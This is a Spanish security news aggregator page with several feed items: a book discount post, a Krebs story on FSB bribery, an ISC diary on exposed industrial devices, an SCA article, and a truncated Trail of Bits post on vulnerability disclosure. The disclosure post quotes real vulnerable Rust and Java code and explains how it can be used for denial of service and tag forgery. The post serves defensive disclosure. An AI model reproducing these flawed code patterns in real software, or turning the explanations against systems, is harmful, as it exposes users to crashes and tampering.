Agregador de canales de noticias

Infocon: green

ISC Stormcast For Tuesday, April 23rd, 2024 https://isc.sans.edu/podcastdetail/8950
Categorías: Security Posts

Día del libro en @0xWord: Cupón 10% descuento DIALIBRO2024" por el #Diadellibro2024

Un informático en el lado del mal - Hace 4 horas 41 mins
Como todos los años, desde 0xWord nos sumamos a celebrar el Día del Libro, así que desde ya mismo, hasta el 28 de Abril a las doce de la noche, podrás conseguir todos los productos de la tienda de 0xWord con un 10% de descuento utilizando el código: DIALIBRO2024.
Figura 1: Día del libro en 0xWord: Cupón 10% descuentoDIALIBRO2024" por el #Diadellibro2024
El código descuento, que estará activo hasta las 23:59 del domingo 28 de Abril es DIALIBRO2024, así que si lo utilizas tendrás un descuento del 10% en todo el material de 0xWord en la tienda. Incluido el material de Cálico Electrónico, los Packs Oferta, los VBOOKs, los cómics de EVIL:ONE en 0xWord Comics, las novelas en 0xWord Pocket o los nuevos de 0xWord Brain.
Figura 2: Compra tus libros de Hacking en 0xWord
Pero además, tienes formas de incrementar los descuentos de 0xWord, utilizando tus Tempos de MyPublicInbox, que puedes usar de dos formas diferentes. Enviando Tempos a 0xWord y consiguiendo un descuento extra o canjeando un código descuento de 0xWord por Tempos de MyPublicInbox. Aquí te explico cómo se hace.
Enviar tus Tempos a 0xWord y recibir el descuento
La idea es muy sencilla, hemos creado un Buzón Público de 0xWord en MyPublicInbox y tenemos disponible el módulo de transferencias de Tempos entre cuentas siempre que el destinatario sea un Perfil Público de la plataforma. Para que se puedan hacer estas transferencias, primero debe estar el Perfil Público destinatario de la transferencia en la Agenda.
Figura 3: Perfil de 0xWord en MyPublicInbox. Opción de "Añadir a  la Agenda".
https://MyPublicInbox.com/0xWord

Para dar de alta un Perfil Público en tu agenda, solo debes iniciar sesión en MyPublicInbox, y con la sesión iniciada ir a la web del perfil. En este caso, a la URL del perfil público de 0xWord en MyPublicInbox, - https://MyPublicInbox.com/0xWord - donde te aparecerá la opción de "Añadir a la agenda". Cuando acabe este proceso, podrás ir a la opción Agenda de tu buzón de correo en MyPublicInbox y deberías tener el Perfil Público de 0xWord allí.
Figura 4: Cuando lo agregues estará en tu agenda
Una vez que lo tengas en la agenda, ya será tan fácil como irte a tu perfil - se accede haciendo clic en la imagen redonda con tu foto en la parte superior - y entrar en la Zona de Transferencias. Desde allí seleccionas el Buzón Público de 0xWord, el número de Tempos que quieres transferir, y en el concepto debes poner que es para recibir un código descuento para usar en la tienda de 0xWord.
Figura 5: Zona de Transferencias en el Perfil de MyPublicInbox
No te preocupes por el texto concreto, porque los procesamos manualmente como los pedidos de se hacen en la tienda. 
Canjear 500 Tempos por un código descuento de 5 €
La última opción es bastante sencilla. Solo debes irte a la sección de Canjear Tempos -> Vales para Tiendas, y "Comprar" por 500 Tempos y código de 5 €. Es lo mismo que enviar la transferencia pero en un paquete de 500 Tempos y de forma totalmente automatizada, así que solo con que le des a comprar recibirás el código descuento y lo podrás utilizar en la tienda de 0xWord.com
Figura 6: Canjear Tempos por Códigos para libros de 0xWord
Así que, si quieres conseguir nuestros libros de Seguridad Informática & Hacking aprovechando los descuentos de las ofertas, entre el código de descuento DIALIBRO2024 y los Tempos de MyPublicInbox podrás hacerlo de forma muy sencilla y mucho, mucho, mucho más barato. Y así apoyas este proyecto tan bonito que es 0xWord.com.
¡Saludos Malignos!
Autor: Chema Alonso (Contactar con Chema Alonso)  


Sigue Un informático en el lado del mal RSS 0xWord
- Contacta con Chema Alonso en MyPublicInbox.com
Categorías: Security Posts

Change Healthcare Finally Admits It Paid Ransomware Hackers—and Still Faces a Patient Data Leak

Wired: Security - Hace 4 horas 47 mins
The company belatedly conceded both that it had paid the cybercriminals extorting it and that patient data nonetheless ended up on the dark web.
Categorías: Security Posts

ISC Stormcast For Tuesday, April 23rd, 2024 https://isc.sans.edu/podcastdetail/8950, (Tue, Apr 23rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Windows vulnerability reported by the NSA exploited to install Russian malware

ArsTechnica: Security Content - Lun, 2024/04/22 - 22:36
Enlarge (credit: Getty Images) Kremlin-backed hackers have been exploiting a critical Microsoft vulnerability for four years in attacks that targeted a vast array of organizations with a previously undocumented tool, the software maker disclosed Monday. When Microsoft patched the vulnerability in October 2022—at least two years after it came under attack by the Russian hackers—the company made no mention that it was under active exploitation. As of publication, the company’s advisory still made no mention of the in-the-wild targeting. Windows users frequently prioritize the installation of patches based on whether a vulnerability is likely to be exploited in real-world attacks. Exploiting CVE-2022-38028, as the vulnerability is tracked, allows attackers to gain system privileges, the highest available in Windows, when combined with a separate exploit. Exploiting the flaw, which carries a 7.8 severity rating out of a possible 10, requires low existing privileges and little complexity. It resides in the Windows print spooler, a printer-management component that has harbored previous critical zero-days. Microsoft said at the time that it learned of the vulnerability from the US National Security Agency.Read 8 remaining paragraphs | Comments
Categorías: Security Posts

Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

Krebs - Lun, 2024/04/22 - 22:07
The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced last week to nine years in a penal colony for accepting a USD $1.7 million bribe to ignore the activities of a prolific Russian cybercrime group that hacked thousands of e-commerce websites. The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps. A now-defunct carding shop that sold stolen credit cards and invoked 45’s likeness and name. As reported by The Record, a Russian court last week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was seeking a “roof,” a well-placed, corrupt law enforcement official who could be counted on to both disregard their illegal hacking activities and run interference with authorities in the event of their arrest. Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia. In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data. They also seized multiple carding shops run by the gang, including Ferum Shop, Sky-Fraud, and Trump’s Dumps, a popular fraud store that invoked the 45th president’s likeness and promised to “make credit card fraud great again.” All of the domains seized in that raid were registered by an IT consulting company in Perm called Get-net LLC, which was owned in part by Artem Zaitsev — one of the six men arrested. Zaitsev reportedly was a well-known programmer whose company supplied services and leasing to the local FSB field office. The message for Trump’s Dumps users left behind by Russian authorities that seized the domain in 2022. Russian news sites report that Internal Affairs officials with the FSB grew suspicious when Tsaregorodtsev became a little too interested in the case following the hacking group’s arrests. The former FSB agent had reportedly assured the hackers he could have their case transferred and that they would soon be free. But when that promised freedom didn’t materialize, four the of the defendants pulled the walls down on the scheme and brought down their own roof. The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars. At Tsaregorodtsev’s trial, his lawyers argued that their client wasn’t guilty of bribery per se, but that he did admit to fraud because he was ultimately unable to fully perform the services for which he’d been hired. The Russian news outlet Kommersant reports that all four of those who cooperated were released with probation or correctional labor. Zaitsev received a sentence of 3.5 years in prison, and defendant Alexander Kovalev got four years. In 2017, KrebsOnSecurity profiled Trump’s Dumps, and found the contact address listed on the site was tied to an email address used to register more than a dozen domains that were made to look like legitimate Javascript calls many e-commerce sites routinely make to process transactions — such as “js-link[dot]su,” “js-stat[dot]su,” and “js-mod[dot]su.” Searching on those malicious domains revealed a 2016 report from RiskIQ, which shows the domains featured prominently in a series of hacking campaigns against e-commerce websites. According to RiskIQ, the attacks targeted online stores running outdated and unpatched versions of shopping cart software from Magento, Powerfront and OpenCart. Those shopping cart flaws allowed the crooks to install “web skimmers,” malicious Javascript used to steal credit card details and other information from payment forms on the checkout pages of vulnerable e-commerce sites. The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.
Categorías: Security Posts

The Next US President Will Have Troubling New Surveillance Powers

Wired: Security - Lun, 2024/04/22 - 18:59
Over the weekend, President Joe Biden signed legislation not only reauthorizing a major FISA spy program but expanding it in ways that could have major implications for privacy rights in the US.
Categorías: Security Posts

It appears that the number of industrial devices accessible from the internet has risen by 30 thousand over the past three years, (Mon, Apr 22nd)

SANS Internet Storm Center, InfoCON: green - Lun, 2024/04/22 - 12:21
It has been nearly three years since we last looked at the number of industrial devices (or, rather, devices that communicate with common OT protocols, such as Modbus/TCP, BACnet, etc.) that are accessible from the internet[1]. Back in May of 2021, I wrote a slightly optimistic diary mentioning that there were probably somewhere between 74.2 thousand (according to Censys) and 80.8 thousand (according to Shodan) such systems, and that based on long-term data from Shodan, it appeared as though there was a downward trend in the number of these systems. Given that few months ago, a series of incidents related to internet-exposed PLCs with default passwords was reported[2], and CISA has been releasing more ICS-related advisories than any other kind for a while now[3], I thought it might be a good time to go over the current numbers and see at how the situation has changed over the past 35 months. At first glance, the current number of ICS-like devices accessible from the internet would seem to be somewhere between 61.7 thousand (the number of “ICS” devices detected by Shadowserver[4]) and 237.2 thousand (the number of “ICS" devices detected by Censys[5]), with Shodan reporting an in-between number of 111.1 thousand [6].  It should be noted though, that even if none of these services necessarily correctly detects all OT devices, the number reported by Censys seems to be significantly overinflated by the fact that the service uses a fairly wide definition of what constitutes an “ICS system” and classifies as such even devices that do not communicate using any of the common industrial protocols. If we do a search limited only to devices that use one of the most common protocols that Censys can detect (e.g., Modbus, Fox, EtherNet/IP, BACnet, etc.), we get a much more believable/comparable number of 106.2 thousand[7]. It is therefore probable that the real number of internet-connected ICS systems is currently somewhere between 61 and 111 thousand, with data from Shodan and Censys both showing an increase of approximately 30 thousand from May 2021. It should be noted, though, that some of the detected devices are certain to be honeypots – of the 106.2 thousand systems reported by Censys, 307 devices were explicitly classified as such[8], however, it is likely that the real number of honeypots among detected systems is significantly higher. If we take a closer look at some of the most often detected industrial protocols, it quickly becomes obvious that – with the exception of BACnet – the data reported by all three services varies significantly between different protocols. It also becomes apparent that the large difference between the number of ICS systems detected by Shodan and Censys (> 100k) and the much smaller number detected by Shadowserver (61k) is caused mainly by a significantly lower number of detected devices that use Modbus on part of Shadowserver. For comparison, at the time of writing, Censys detects 54,770 internet-exposed devices using this protocol, while Shodan detects 33,036 of such devices, and Shadowserver detects only about 6,300 of them. While on the topic of Modbus, it is worth noting that the number of ICS-like devices that support this protocol detected by both Shodan and Censys has increased significantly since 2021, and this increase seems to account for most of the overall rise in the number of detected ICS devices. In fact, if we take a closer look at the changes over time, it is clear that the downward trend, which I mentioned in the 2021 diary, didn’t last too long. Looking at data gathered from Shodan using my TriOp tool[9], it seems that shortly after I published the diary, the number of detected ICS devices rose significantly, and it has oscillated around approximately 100 thousand ever since. Although data provided by Shodan are hardly exact, the hypothesis that the number of internet-connected ICS devices has not fallen appreciably for at least the last two years seems to be supported by data from Shadowserver, as you may see in the following chart. Nevertheless, even though there has therefore probably not been any notable decrease in the number of internet-connected ICS devices, this doesn’t mean that there have not been changes in the types of devices and the protocols they communicate with. As the following chart from Shodan shows, these aspects have changed quite a lot over time. It is also worth mentioning that these charts and the aforementioned numbers describe the overall situation on the global internet, and therefore say nothing about the state of affairs in different countries around the world. This is important since although there may not have been any appreciable decrease in the number of internet-exposed ICS devices globally, it seems that the number of these devices has decreased significantly in multiple countries in the past few years – most notably in the United States, as you may see in the following chart from Shodan (though, it is worth noting that Shadowserver saw only a much lower decrease for the US – from approximately 32 thousand ICS devices to the current 29.5 thousand devices[10]). Unfortunately, the fact that in some countries, the number of internet-connected ICS devices has fallen also means that there are (most likely) multiple countries where it has just as significantly risen, given that we have not seen an overall, global decrease… In fact, the must be countries where it rose much more significantly, given the aforementioned overall increase of approximately 30 thousand ICS systems detected by both Shodan and Censys globally. So, while I have ended the 2021 diary stating a hope that the situation might improve in time and that the number of industrial/OT systems accessible from the internet will decrease, I will end this one on a slightly more pessimistic note – hoping that the situation doesn’t worsen just as significantly in the next three years as it did in the past three… [1] https://isc.sans.edu/diary/Number+of+industrial+control+systems+on+the+internet+is+lower+then+in+2020but+still+far+from+zero/27412
[2] https://therecord.media/cisa-water-utilities-unitronics-plc-vulnerability
[3] https://www.cisa.gov/news-events/cybersecurity-advisories?page=0
[4] https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=30&source=ics&style=stacked
[5] https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=labels%3D%60ics%60
[6] https://www.shodan.io/search?query=tag%3Aics
[7] https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=%28labels%3D%60ics%60%29+and+%28services.service_name%3D%60MODBUS%60+or+services.service_name%3D%60FOX%60+or+services.service_name%3D%60BACNET%60+or+services.service_name%3D%60EIP%60+or+services.service_name%3D%60S7%60+or+services.service_name%3D%60IEC60870_5_104%60%29
[8] https://search.censys.io/search?resource=hosts&virtual_hosts=EXCLUDE&q=%28%28labels%3D%60ics%60%29+and+%28services.service_name%3D%60MODBUS%60+or+services.service_name%3D%60FOX%60+or+services.service_name%3D%60BACNET%60+or+services.service_name%3D%60EIP%60+or+services.service_name%3D%60S7%60+or+services.service_name%3D%60IEC60870_5_104%60%29%29+and+labels%3D%60honeypot%60
[9] https://github.com/NettleSec/TriOp
[10] https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&d1=2022-04-23&d2=2024-04-22&source=ics&geo=US&style=stacked -----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Introduction to Software Composition Analysis and How to Select an SCA Tool

AlienVault Blogs - Mié, 2024/04/17 - 12:00
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Software code is constantly growing and becoming more complex, and there is a worrying trend: an increasing number of open-source components are vulnerable to attacks. A notable instance was the Apache Log4j library vulnerability, which posed serious security risks. And this is not an isolated incident. Using open-source software necessitates thorough Software Composition Analysis (SCA) to identify these security threats. Organizations must integrate SCA tools into their development workflows while also being mindful of their limitations. Why SCA Is Important Open-source components have become crucial to software development across various industries. They are fundamental to the construction of modern applications, with estimates suggesting that up to 96% of the total code bases contain open-source elements. Assembling applications from diverse open-source blocks presents a challenge, necessitating robust protection strategies to manage and mitigate risks effectively. Software Composition Analysis is the process of identifying and verifying the security of components within software, especially open-source ones. It enables development teams to efficiently track, analyze, and manage any open-source element integrated into their projects. SCA tools identify all related components, including libraries and their direct and indirect dependencies. They also detect software licenses, outdated dependencies, vulnerabilities, and potential exploits. Through scanning, SCA creates a comprehensive inventory of a project's software assets, offering a full view of the software composition for better security and compliance management. Although SCA tools have been available for quite some time, the recent open-source usage surge has cemented their importance in application security. Modern software development methodologies, such as DevSecOps, emphasize the need for SCA solutions for developers. The role of security officers is to guide and assist developers in maintaining security across the Software Development Life Cycle (SDLC), ensuring that SCA becomes an integral part of creating secure software. Objectives and Tasks of SCA Tools Software Composition Analysis broadly refers to security methodologies and tools designed to scan applications, typically during development, to identify vulnerabilities and software license issues. For effective management of open-source components and associated risks, SCA solutions help navigate several tasks: 1) Increasing Transparency A developer might incorporate various open-source packages into their code, which in turn may depend on additional open-source packages unknown to the developer. These indirect dependencies can extend several levels deep, complicating the understanding of exactly which open-source code the application uses. Reports indicate that 86% of vulnerabilities in node.js projects stem from transitive (indirect) dependencies, with similar statistics in the Java and Python ecosystems. This suggests that most security vulnerabilities in applications often originate from open-source code that developers might not even be aware of. For cloud applications, open-source components in container images can also pose transparency challenges, requiring identification and vulnerability scanning. While the abstraction containers offer to programmers is beneficial for development, it simultaneously poses a security risk, as it can obscure the details of the underlying components. 2) Grasping the Logic of Dependencies Accurately identifying dependencies - and the vulnerabilities they introduce - demands a comprehensive understanding of each ecosystem's unique handling of them. It is crucial for an SCA solution to recognize these nuances and avoid generating false positives. 3) Prioritizing Vulnerabilities Due to the limited resources at the disposal of developers and security professionals, prioritizing vulnerabilities becomes a significant challenge without the required data and knowledge. While the Common Vulnerability Scoring System (CVSS) offers a method for assessing vulnerabilities, its shortcomings make it somewhat challenging to apply effectively. The main issues with CVSS stem from the variance in environments, including how they are operated, designed, and put together. Additionally, CVSS scores do not consider the age of a vulnerability or its involvement in exploit chains, further complicating their usage. 4) Building an Updated, Unified Vulnerability Database A vast array of analytical data on vulnerabilities is spread out over numerous sources, including national databases, online forums, and specialized security publications. However, there is often a delay in updating these sources with the latest vulnerability information. This delay in reporting can be critically detrimental. SCA tools help address this issue by aggregating and centralizing vulnerability data from a wide range of sources. 5) Speeding Up Secure Software Development Before the code progresses in the release process, it must undergo a security review. If the services tasked with checking for vulnerabilities do not do so swiftly, this can slow down the entire process. The use of AI test automation tools offers a solution to this issue. They enable the synchronization of development and vulnerability scanning processes, preventing unforeseen delays. The challenges mentioned above have spurred the development of the DevSecOps concept and the "Shift Left" approach, which places the responsibility for security directly on development teams. Guided by this principle, SCA solutions enable the verification of the security of open-source components early in the development process, ensuring that security considerations are integrated from the outset. Important Aspects of Choosing and Using SCA Tools Software Composition Analysis systems have been in existence for over a decade. However, the increasing reliance on open-source code and the evolving nature of application assembly, which now involves numerous components, have led to the introduction of various types of solutions. SCA solutions range from open-source scanners to specialized commercial tools, as well as comprehensive application security platforms. Additionally, some software development and maintenance solutions now include basic SCA features. When selecting an SCA system, it is helpful to evaluate the following capabilities and parameters: ● Developer-Centric Convenience Gone are the days when security teams would simply pass a list of vulnerabilities to developers to address. DevSecOps mandates a greater level of security responsibility on developers, but this shift will not be effective if the tools at their disposal are counterproductive. An SCA tool that is challenging to use or integrate will hardly be beneficial. Therefore, when selecting an SCA tool, make sure it can: - Be intuitive and straightforward to set up and use - Easily integrate with existing workflows - Automatically offer practical recommendations for addressing issues ● Harmonizing Integration in the Ecosystem An SCA tool's effectiveness is diminished if it cannot accommodate the programming languages used to develop your applications or fit seamlessly into your development environment. While some SCA solutions might offer comprehensive language support, they might lack, for example, a plugin for Jenkins, which would allow for the straightforward inclusion of application security testing within the build process or modules for the Integrated Development Environment (IDE). ● Examining Dependencies Since many vulnerabilities are tied to dependencies, whose exploitation can often only be speculated, it is important when assessing an SCA tool to verify that it can accurately understand all the application's dependencies. This ensures those in charge have a comprehensive view of the security landscape. It would be good if your SCA tool could also provide a visualization of dependencies to understand the structure and risks better. ● Identifying Vulnerabilities An SCA tool's ability to identify vulnerabilities in open-source packages crucially depends on the quality of the security data it uses. This is the main area where SCA tools differ significantly. Some tools may rely exclusively on publicly available databases, while others aggregate data from multiple proprietary sources into a continuously updated and enriched database, employing advanced analytical processes. Even then, nuances in the database's quality and the accuracy and comprehensiveness of its intelligence can vary, impacting the tool's effectiveness. ● Prioritizing Vulnerabilities SCA tools find hundreds or thousands of vulnerabilities, a volume that can swiftly become unmanageable for a team. Given that it is practically unfeasible to fix every single vulnerability, it is vital to strategize which fixes will yield the most significant benefit. A poor prioritization mechanism, particularly one that leads to an SCA tool frequently triggering false positives, can create unnecessary friction and diminish developers' trust in the process. ● Fixing Vulnerabilities Some SCA tools not only detect vulnerabilities but also proceed to the logical next step of patching them. The range of these patching capabilities can differ significantly from one tool to another, and this variability extends to the recommendations provided. It is one matter to suggest upgrading to a version that resolves a specific vulnerability; it is quite another to determine the minimal update path to prevent disruptions. For example, some tools might automatically generate a patch request when a new vulnerability with a recommended fix is identified, showcasing the advanced and proactive features that differentiate these tools in their approach to securing applications. ● Executing Oversight and Direction It is essential to choose an SCA tool that offers the controls necessary for managing the use of open-source code within your applications effectively. The ideal SCA tool should come equipped with policies that allow for detailed fine-tuning, enabling you to granularly define and automatically apply your organization's specific security and compliance standards. ● Reports   Tracking various open-source packages over time, including their licenses, serves important purposes for different stakeholders. Security teams, for example, may want to evaluate the effectiveness of SCA processes by monitoring the number and remediation of identified vulnerabilities. Meanwhile, legal departments might focus on compiling an inventory of all dependencies and licenses to ensure the organization's adherence to compliance and regulatory requirements. Your selected SCA tool should be capable of providing flexible and detailed reporting to cater to the diverse needs of stakeholders. ● Automation and Scalability Manual tasks associated with SCA processes often become increasingly challenging in larger development environments. Automating tasks like adding new projects and users for testing or scanning new builds within CI/CD pipelines not only enhances efficiency but also helps avoid conflicts with existing workflows. Modern SCA tools should use machine learning for improved accuracy and data quality. Another critical factor to consider is the availability of a robust API, which enables deeper integration. Moreover, the potential for interaction with related systems, such as Security Orchestration, Automation, and Response (SOAR) and Security Information and Event Management (SIEM), in accessing information on security incidents, is also noteworthy. ● Application Component Management Modern applications consist of numerous components, each requiring scanning and protection. A modern SCA tool should be able to scan container images for vulnerabilities and seamlessly integrate into the workflows, tools, and systems used for building, testing, and running these images. Advanced solutions may also offer remedies for identified flaws in containers. Conclusion Every organization has unique requirements influenced by factors like technology stack, use case, budget, and security priorities. There is no one-size-fits-all solution for Software Composition Analysis. However, by carefully evaluating the features, capabilities, and integration options of various SCA tools, organizations can select a solution that best aligns with their specific needs and enhances their overall security posture. The chosen SCA tool should accurately identify all open-source components, along with their associated vulnerabilities and licenses.
Categorías: Security Posts

5 reasons to strive for better disclosure processes

By Max Ammann This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes. Here are the five bugs: Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner. In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post. Case 1: Undefined behavior in borsh-rs Rust library The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years. During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug. The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub. I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed. The following code contained the bug that caused undefined behavior: impl<T> BorshDeserialize for Vec<T> where T: BorshDeserialize, { #[inline] fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> { let len = u32::deserialize(reader)?; if size_of::<T>() == 0 { let mut result = Vec::new(); result.push(T::deserialize(reader)?); let p = result.as_mut_ptr(); unsafe { forget(result); let len = len as usize; let result = Vec::from_raw_parts(p, len, len); Ok(result) } } else { // TODO(16): return capacity allocation when we can safely do that. let mut result = Vec::with_capacity(hint::cautious::<T>(len)); for _ in 0..len { result.push(T::deserialize(reader)?); } Ok(result) } } } Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150) The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable. The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness. Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties. The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing: https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort. Read more about the technical details of this bug in the blog post Billion times emptiness. Case 3: Missing limit on authentication tag length in Expo In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software. When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, secure@expo.io, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year. Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had. Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext: /* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException { byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8); byte[] ciphertextBytes = cipher.doFinal(plaintextBytes); String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP); String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP); int authenticationTagLength = gcmSpec.getTLen(); JSONObject result = new JSONObject() .put(CIPHERTEXT_PROPERTY, ciphertext) .put(IV_PROPERTY, ivString) .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength); postEncryptionCallback.run(promise, result); return result; } Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java) For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore. An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST. From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there. The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits. The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately. Case 4: DoS vector in the num-bigint Rust library In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE. The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear. But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails. The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature: use num_bigint::BigUint; use std::io::Read; fn main() -> std::io::Result<()> { let mut buf = Vec::new(); let _ = std::io::stdin().read_to_end(&mut buf)?; let _: BigUint = bincode::deserialize(&buf).unwrap_or_default(); Ok(()) } Figure 3: Example deserialization format It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed. impl<'de> Visitor<'de> for U32Visitor { type Value = BigUint; {...omitted for brevity...} #[cfg(not(u64_digit))] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { let len = seq.size_hint().unwrap_or(0); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } #[cfg(u64_digit)] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { use crate::big_digit::BigDigit; use num_integer::Integer; let u32_len = seq.size_hint().unwrap_or(0); let len = Integer::div_ceil(&u32_len, &2); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } } Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108) We initially contacted the author on July 20, 2023, and the bug was fixed in commit 